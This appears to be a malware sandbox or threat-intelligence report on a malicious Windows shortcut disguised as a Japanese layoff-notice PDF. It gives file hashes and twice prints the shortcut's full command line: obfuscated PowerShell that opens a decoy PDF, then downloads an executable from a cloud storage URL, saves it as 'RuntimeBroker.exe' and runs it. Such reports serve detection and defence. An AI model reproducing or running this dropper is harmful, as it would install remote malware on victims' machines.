|
Hash | Hash Value |
|---|---|
| MD5 | 585da0337e9d9a9c1d5bf097bdf8c1f1
|
| Sha1 | 16643b92b6012fd58f6c8fa38741435e7c6fe43c
|
| Sha256 | 80b875df61fac83d0ff878b6dce5ce67db88c397522e6f6a7ccae5bf882eef0d
|
| Sha384 | 27cb5f000543fdac5866798e26197f5a10eaed956fbedf737ba9608a3954080b889ca8165de466f1ed2aadaaba6d69c1
|
| Sha512 | 5ba0e05502681db9f1bf95833e88b9b366dc328cec03b9513325772924d059e0023c472a838f23dcf6e5fd4459d7a3f56c34556bf98d6678cfa4785356c7a548
|
| SSDeep | 3072:xJIYJ7JESQJyEAlShBoeDnCVfJUoCBFc4prz1MaZ2Z1Frfh+3pVMwmw:xuUJESjEO6Boej2f7CCQopszMwmw
|
| TLSH | 8A0423DA50D1CAB4C1A1B92A0C3A4F95BA52F70D05C2DEFF31B42D52E2CABD505FB189
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /c md %TEMP%\vzvqljeo 2>nul&powershell -nop -w 1 -c "$n='リストラ通知書..pdf.lnk';$ds=@((gl).Path,[Environment]::GetFolderPath('Desktop'),(Join-Path $env:USERPROFILE 'Downloads'),$env:USERPROFILE,(Join-Path $env:USERPROFILE 'Documents'));$f=$null;$ds|%{$t=Join-Path $_ $n;if(!$f-and(Test-Path $t)){$f=$t}};if(!$f){gci $env:TEMP -r -fi $n -ea 0|select -f 1|%{$f=$_.FullName}};if($f){$b=[IO.File]::ReadAllBytes($f);$o=Join-Path '%TEMP%\vzvqljeo' 'リストラ通知書..pdf';[IO.File]::WriteAllBytes($o,[byte[]]$b[4433..196053]);saps $o}"&set el=cu&set iz=rl.exe&call %el%%iz% -s -o %TEMP%\vzvqljeo\RuntimeBroker.exe https://storage.googleapis.com/opentokenaiit/newgram.exe&start /b %TEMP%\vzvqljeo\RuntimeBroker.exe |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /c md %TEMP%\vzvqljeo 2>nul&powershell -nop -w 1 -c "$n='リストラ通知書..pdf.lnk';$ds=@((gl).Path,[Environment]::GetFolderPath('Desktop'),(Join-Path $env:USERPROFILE 'Downloads'),$env:USERPROFILE,(Join-Path $env:USERPROFILE 'Documents'));$f=$null;$ds|%{$t=Join-Path $_ $n;if(!$f-and(Test-Path $t)){$f=$t}};if(!$f){gci $env:TEMP -r -fi $n -ea 0|select -f 1|%{$f=$_.FullName}};if($f){$b=[IO.File]::ReadAllBytes($f);$o=Join-Path '%TEMP%\vzvqljeo' 'リストラ通知書..pdf';[IO.File]::WriteAllBytes($o,[byte[]]$b[4433..196053]);saps $o}"&set el=cu&set iz=rl.exe&call %el%%iz% -s -o %TEMP%\vzvqljeo\RuntimeBroker.exe https://storage.googleapis.com/opentokenaiit/newgram.exe&start /b %TEMP%\vzvqljeo\RuntimeBroker.exe Malicious |
585da0337e9d9a9c1d5bf097bdf8c1f1 > ¥ê¥¹¥È¥é֪ͨ•ø.pdf.lnk |